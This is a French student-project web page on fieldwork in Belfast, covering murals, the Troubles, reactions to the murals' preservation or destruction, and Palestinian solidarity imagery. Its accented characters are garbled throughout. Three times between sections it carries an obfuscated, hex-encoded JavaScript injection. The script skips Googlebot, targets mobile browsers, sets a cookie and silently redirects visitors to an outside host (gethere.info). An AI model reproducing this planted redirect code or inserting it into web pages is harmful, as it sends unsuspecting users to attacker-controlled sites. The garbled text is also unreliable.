Retour rA�flexif

Notre premier travail de terrain A� Belfast a A�tA� un vrai dA�fi, mais en dA�fi intA�ressant. Il a A�tA� A�frappant de constater comment cette ville oscille entre deux extrA�mitA�s : da��un cA?tA� il y a les traces physiques ainsi que psychologiques laissA�es par les Troubles et de la��autre cA?tA� il y a la volontA� de se reconstruire. Ce travail nous a permis da��interagir directement avec les Belfastois et ca��est A� travers leurs mots que nous avons repA�rA� ces sentiments contrastA�s. En effet, ils A�taient souvent trA?s ouverts A� la discussion et avaient envie de transmettre leur message et leur histoire. A ce sujet, une premiA?re difficultA� qui a A�mergA� est la barriA?re linguistique. Effectivement, l’accent nord-irlandais est trA?s fort, surtout dans les quartiers populaires, oA? nous avons rA�alisA� la plupart de notre terrain. Il A�tait souvent difficile d’A?tre subtil dans notre approche, mais A�galement de saisir les subtilitA�s des propos qui nous A�taient tenus. Il A�tait aussi difficile de rebondir sur ce qui nous intA�ressait, ou d’approfondir les points sensibles. Cela en raison de la langue da��une part, et du fait qua��il sa��agissait de notre premier travail de terrain de la��autre.

De plus, nous travaillions sur les A�motions et ce thA?me est dA�licat. Il A�tait difficile pour nous de trouver les mots justes et le bon angle d’approche. Nous avons souvent remarquA� une certaine rA�ticence de la part de nos interlocuteurs, qui avaient tendance A� contourner les questions en rapport avec les A�motions ou A� A?tre trA?s brefs dans leurs rA�ponses. Les A�motions sont ce qu’il y a de plus personnel et intime, et d’en parler librement n’est jamais chose facile. Nous avons A�galement perA�u un rapport conflictuel entre le A� nous A� en tant que A� chercheuses A� et le A� nous A� en tant que A� touristes A�. Nous avons dA� apprendre A� gA�rer ces deux cA?tA�s.

Enfin, notre recherche sur place sa��est rA�vA�lA�e A?tre un a�?terrain fertilea�? A� la production da��idA�es: elle a offert une multitude de pistes, ainsi que des dA�couvertes que nous avons eu envie da��explorer plus en profondeur. Pour A�viter le risque da��A�garement, il a fallu savoir exploiter ces idA�es, en tirer la��inspiration, pour mieux dA�finir et cibler la problA�matique. Si nous na��avions pas A�tA�s limitA�es par le temps, il aurait A�tA� intA�ressant de faire de plus longs entretiens.

Bibliographie

  • Assayag J., A� Le spectre des gA�nocides A�, Gradhiva , nA� 5, 2007, [en ligne], URL : http://gradhiva.revues.org/658, ConsultA� le 05.04.2016
  • Bernard J., A� Les voies da��approche des A�motions A�, Terrains/ThA�ories, nA�2, 2015, [en ligne], URL : http://teth.revues.org/196, ConsultA� le 09.01.2016

Cet article traite de la faA�on dont les A�motions peuvent A?tre traitA�es dans le cadre de recherches en sciences sociales. Il est particuliA?rement intA�ressant car il explique en quoi rA�colter les A�motions des chercheurs peut A?tre un bon complA�ment A� la recherche.

Cet article traite des A�motions dans le contexte touristiques en Palestine et en IsraA�l. Les auteurs utilisent la notion de danger-zone tourism et plaident pour une meilleure prise en compte des A�motions dans les A�tudes sur le tourisme.

Cet article en anglais prA�sente la faA�on dont sont utilisA�s les murals da��Irlande du Nord actuellement: vendus A� travers le tourisme da��une part et porteurs de message de paix de la��autre part. La��auteur donne A�galement un panorama des acteurs qui se partagent les murals (ex-dA�tenus, A�municipalitA� et A�autoritA�s) et propose quelques exemples de murals.

  • Folio F., A� Critiques et enjeux du Dark tourism A� travers la focale sud-africaine A�, EchoGA�o, nA�34, 2015, [en ligne], URL : http://echogeo.revues.org/1437, ConsultA� le 01.05.2016.

Cet article rend compte de la��A�tude du dark tourism en Afrique du Sud. Il nous a permis de mieux comprendre le concept de dark tourism.

Cet article prA�sente les peintures murales rA�publicaines (contexte historique, thA?mes prA�conisA�s) dans un ordre chronologique.

  • MSF Press, The Belfast murals guide, 2014

Ce petit guide touristique des murals de Belfast donne pour chaque mural un rapide historique, la localisation GPS et le contexte. Il nous a A�tA� utile pour choisir le mural sur lequel nous avons travaillA� et pour les comprendre.

Sitographie

Ce site internet nous a renseignA� sur les tendances actuelles du tourisme A� Belfast.

Ce site internet recense A� la��heure actuelle 223 murals et les cartographie avec un code de couleur. Les murals rA�publicains/nationalistes sont en vert, les murals loyalistes/unionistes en rouge et en bleu ce sont les murals socio-culturels. Cette page web est en cours da��A�laboration, elle a A�tA� crA�e en 2014 et a comme but de rA�fA�rencer davantage de murals. Ce site nous a servi pour avoir un aperA�u de la localisation des murals.

  • Cain Web service – Conflicts and Politics in Northern Ireland, [en ligne] URL: http://cain.ulst.ac.uk, ConsultA� le 05.02.2016

Ce site internet, Cain (pour Conflict Archive on the INternet), affiliA� A� la��universitA� de Ulster, prA�sente des informations sur la pA�riode des troubles et sur la politique de la��Irlande du Nord depuis 1968. Il rA�fA�rencie A�normA�ment de sources, da��archives, de chiffres (databases) et prA�sente plusieurs extraits de livre consultables en ligne. Il a la��avantage da��A?tre classA� par sujet, da��A?tre clair et de rendre la��information facilement accessible. Nous la��utilisons aussi pour rechercher des informations sur les murals que nous avons choisis, notamment leur auteur, la date de crA�ation ou encore la signification des symboles qua��ils reprA�sentent.

VidA�ographie

  • Vaughn V., Art of Conflict, documentaire historique, 2012, 73 min

Ce documentaire traite des peintures murales de Belfast, des messages qua��ils expriment.

Iconographie

  1. C. Vetter, Mural de Bobby Sands, Falls Road, Belfast, 01.03.2016
  2. C. Walder, Mural en mA�moire de Bobby Sands, Falls Road, Belfast, 01.03.201
  3. C. Vetter,A�Copie de la photo de Bobby Sands et plan des murals du quartier de Falls, 04.05.2016
  4. C. Walder,A�Mural en mA�moire de la��Easter Rising, Falls road, Belfast, 03.03.2016
  5. C. Walder, DA�tail ajoutA� par le street artiste Jef AA�rosol sur le mural de Bobby Sands, Falls Road, Belfast, 03.03.2016

Notes de bas de pages

  1. Belfast City council, [en ligne], URL: http://www.belfastcity.gov.uk/tourism-venues/tourism/tourism-about.aspx A�(visitA� le 01.05.2016)
  2. Belfast City council, A�[en ligne], URL: http://www.belfastcity.gov.uk/tourism-venues/tourism/tourismfacts.aspx (visitA� le 01.05.2016)
  3. InterrogA� le mardi 1er mars 2016, Falls, devant le mural
  4. InterrogA� le jeudi 3 mars 2016, Falls, devant le mural
  5. Sur la rue de Hopewell Cress Road, dans le quartier de Shankill
  6. Notes du carnet de terrain, mardi 1er mars 2016
  7. InterrogA�e le jeudi 3 mars 2016, Falls, devant le mural
  8. InterrogA�s le jeudi 3 mars 2016, Falls, devant le mural
  9. InterrogA�s le jeudi 3 mars 2016
  10. InterrogA�e le mardi 1er mars 2016, Falls, devant le mural
  11. InterrogA�e le mardi 1er mars 2016, Falls, devant le mural
  12. Quartier rA�publicain, prA?s de Falls Road, adjacent au quartier loyaliste de Shankill
  13. InterrogA� le mardi 1er mars 2016, Ballymurphy
  14. Lors de notre voyage da��A�tude, nous avons participA� A� un cours de sociologie A� la Queens University. Le thA?me A�tant la��utilisation controversA�s des drapeaux en Irlande du Nord, le cours a pris la forme de discussion pas petits groupes avec les A�tudiants de Belfast.
  15. Notes du carnet de terrain, jeudi 3 mars 2016
  16. Notes du carnet de terrain, vendredi 4 mars 2016

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Entre prA�servation et destruction: la place des murals de Belfast

Par Assmaa Shaban, Estelle Pannatier, Laura Perez &A�Sophie CompagnonA�

La��art a souvent une dimension contestataire et il est frA�quent que des artistes prennent position pour des causes qui leur sont chA?res. Mais dans certains cas, la��art peut devenir le dernier moyen d’expression des individus ou des populations lorsque ceux-ci n’ont plus d’autres moyens de communiquer leurs revendications. Ca��est le cas notamment en Irlande du Nord, oA? la��art, sous la forme des murals, est devenu une vA�ritable arme durant le conflit qui a opposA� les Loyalistes et les RA�publicains durant le 20e siA?cle.

A Belfast, les premiA?res fresques loyalistes sont apparues au dA�but du 20e siA?cle et comme le rappelle B. Rolston, elles A�taient peintes A� la��origine durant les festivitA�s qui commA�moraient la bataille de Boyne du 12 juillet 1690 (Rolston B., 1992, p.1). La population protestante profitait de cette opportunitA� pour rA�affirmer sa loyautA� A� la Couronne da��Angleterre et sa suprA�matie sur la population de confession catholique (Tosser R., 2009, p.5). Ainsi, selon P. PragnA?re, a�?tout en revendiquant unionisme et loyalisme envers la Grande-Bretagne, ces peintures A�taient dA�jA� le symbole da��une affirmation de propriA�tA� sur la��espace public et sur la��espace proprement dita�? (PragnA?re P., 2009, p.3). Da��aprA?s N. Jarman, les fresques loyalistes reprA�sentaient en gA�nA�ral des thA?mes hA�ritA�s de la tradition da��Orange ou des groupes paramilitaires (Jarman N., 2001).

Les murals rA�publicains sont apparus plus tardivement. En effet, ce na��est qua��A� partir du dA�veloppement violent du conflit que cette pratique se rA�pand chez les RA�publicains. Ils traduisaient un rA�A�quilibrage des rapports de forces entre RA�publicains et Loyalistes et a�?constituaient une rA�ponse symbolique A� la domination protestantea�? (PragnA?re P., 2009, p.3). Ca��est dans la pA�riode 1979-1978, aprA?s la mort de Bobby Sands, premier grA�viste de la faim, que sa��est rA�pandue A� grande A�chelle la peinture de murals rA�publicains (Tosser R., p.5). Ceux-ci A�taient peints en soutien au mouvement de protestation des prisonniers rA�publicains qui rA�clamaient le maintien de leurs statut de prisonniers politiques (PragnA?re P., 2009, p.4). Les thA?mes de ces fresques sa��inspiraient donc de la rA�sistance du parti rA�publicain Sinn FA�in et de la��IRA, le principal groupe paramilitaire rA�publicain. AprA?s le cessez-le-feu de 1994, lorsque Sinn FA�in cherchait A� lA�gitimer son existence en tant que parti politique officiel, les peintres rA�publicains ont commencA� A� remplacer les anciens thA?mes par des sujets liA�s A� la communautA� culturelle nationaliste, irlandaise ou encore celtique (Jarman N., 2001, p.9-10).

Au fil du temps, de plus en plus da��auteurs de fresques ont commencA� A� reprA�senter des sujets internationaux. Ainsi, sur la��International Wall, des fresques sa��inspirant d’A�vA?nements qui ont lieu dans da��autres parties du monde sont rA�guliA?rement peintes. AprA?s la��accord dit du a�?Vendredi Sainta�? signA� en avril 1998, les murals A� caractA?re militaire ont peu A� peu laissA� la place A� de nouveaux thA?mes. Ceux-ci retracent notamment des moments forts de la��histoire des quartiers de la ville comme la��univers du livre Narnia, dont la��auteur C.S. Lewis est nA� A� Belfast, ou le Titanic qui a A�tA� construit dans la ville. En effet, comme la��A�voque le film a�?The Art of Conflicta�?, rA�alisA� par V. Vaughn en 2012, de nouvelles reprA�sentations voient le jour sur les murs de certains quartiers, dans le but de fA�dA�rer les deux communautA�s et de crA�er une sociA�tA� en paix.

Les murals sont ainsi devenus, selon N. Jarman a�?la��indice visuel le plus reprA�sentatif des troubles, et la��icA?ne par excellence du Belfast contemporaina�? (Jarman N., 2001, p.8). Durant le conflit, ces fresques ont A�tA� le vecteur de diffusion da��un sentiment identitaire qui a conduit au renforcement du communautarisme (Jarman N., 2001, p.8). Mais si la��art a A�tA� utilisA� comme arme par les deux parties durant le conflit, la place de ces fresques, A� caractA?re violent parfois, est aujourda��hui remise en question dans le contexte du processus de paix. Les autoritA�s et les communautA�s locales doivent en effet dA�cider si elles entendent prA�server ou dA�truire cet hA�ritage controversA�.

Parmi la multitude da��approches envisageables, nous avons choisi de baser notre dA�marche sur la perception de cette problA�matique par les habitants. En effet, selon nous, la comprA�hension du ressenti de la population est fondamentale pour la��A�laboration de solutions durables. Ainsi, lors de notre voyage da��A�tude A� Belfast, nous avons cherchA� A� interroger des habitants afin de comprendre comment la violence symbolique qui sa��exprime au travers des murals hA�ritA�s des troubles est vA�cue par les Belfastois. Nous avons A�galement tentA� de saisir quelle A�tait la place que les habitants attribuent aujourda��hui A�A� ces fresques et comment ils envisagent la��avenir des murals.

Nos hypothA?ses de travail ont A�tA� les suivantes:

  • Les Belfastois sont encore profondA�ment touchA�s par la prA�sence de ces murals
  • Les murals ont une place encore importante dans la vie des Belfastois qui ne souhaitent par consA�quent pas voir les fresques dA�truites.

MA�thodologie

Analyse des donnA�es

Conclusion

Bibliographie

Jarman N., 2001, a�?Fragments et strates : DA�cryptage de la gA�ographie sectaire de Belfasta�? in Bromberger Ch., Morel A. (ed.) Limites floues,frontiA?res vives : Des variations culturelles en France et en Europe, Paris, A�ditions de la Maison des sciences de la��homme.

Mourlon F., 2012, a�?Official Responses to Dealing with the Past in Northern Ireland: Between Remembering and Forgetting a�?, E-rea, 10.1.

PragnA?re P., 2009, a�?Peintures murales en Irlande du Nord et au Pays basque : mobilisation populaire et crA�ation da��identitA� nationalea�?, Les Cahiers du MIMMOC, nA�5.

Roston B., 1992, Drawing support: murals in the North of Ireland, Belfast, Beyong the Pale Publications.

Tosser R., 2009, a�?Fresques et marches orangistesa�?, Les Cahiers du MIMMOC, nA�5.

Vaughn V., 2012 a�?Art of conflicta�? [Film documentaire].

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ReprA�sentations Palestiniennes A� Belfast

Parmi les diffA�rentes thA�matiques des fresques de Belfast, la question palestinienne est rA�curante. Le restes du conflitA�da��apparence religieuse, divise la population de Belfast entre catholiques, les rA�publicains, qui souhaitent se rattacher A� la��Irlande, et les protestants ou unionistes, qui revendiquent au contraire leur appartenance au Royaume-Uni.

Chaque communautA�A�se rattache A� des symboles prA�cis qui A�voquent leurs revendications et peuvent, dans certains cas, A?tre liA�s A� des conflits externes. Le conflit israA�lo-palestinien est en effet reprA�sentA� A� Belfast A� travers diffA�rents messages visuels placA�s sur les murs A�rigA�s lors du conflit. Notre sujet portera donc sur la��enjeu du soutien des rA�publicains d’Irlande du Nord A� la cause palestinienne. Quels sont les liens entre ces deux conflits et les motivations de ce rapprochement ?

A�videmment, les deux conflits ne sont pas identiques. Pourtant les deux parlent de questions religieuses, culturelles et territoriales. Les catholiques da��Irlande du Nord, tout comme les Palestiniens, ont vu leur territoire se faire envahir par des populations aux idA�aux et cultures diffA�rent(e)s; les Anglais protestants pour le cas de la��Irlande et les juifs IsraA�liens pour le cas de la Palestine. Ces deux confrontations entre diffA�rents groupes da��individus ont toutes deux abouties A� des conflits de cohabitation, jusqua��au dA�clenchement da��une guerre ouverte. Les catholiques en Irlande du Nord, comme les Palestiniens, se sont tous deux, A� un moment donnA�, retrouvA�s dans la��obligation de partager un espace dA�fini.

Les liens entre Palestiniens et Catholiques irlandais se retrouvent au niveau territorial, mais aussi dans la symbolique des murals et autres. A�C’estA�ainsi, A� partir d’A�lA�ments comme des t-shirt de soutien ou des affiches pro-palestine, que nous tenterons de comprendre la��intensitA� du mouvement actuel de solidaritA� en faveur de la Palestine A� Belfast.

IMG_7447
Par Solenne, Affiche de soutien A� Gaza dans le quartier de Falls, mars 2016.

IMG_0013
Par Alexandrine, T-shirt de soutien A� la Palestine, exposA� dans une boutique souvenirs, mars 2016.
var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

International conflicts on the wall

Cliquez sur l’image pour aller vers le document PDF :
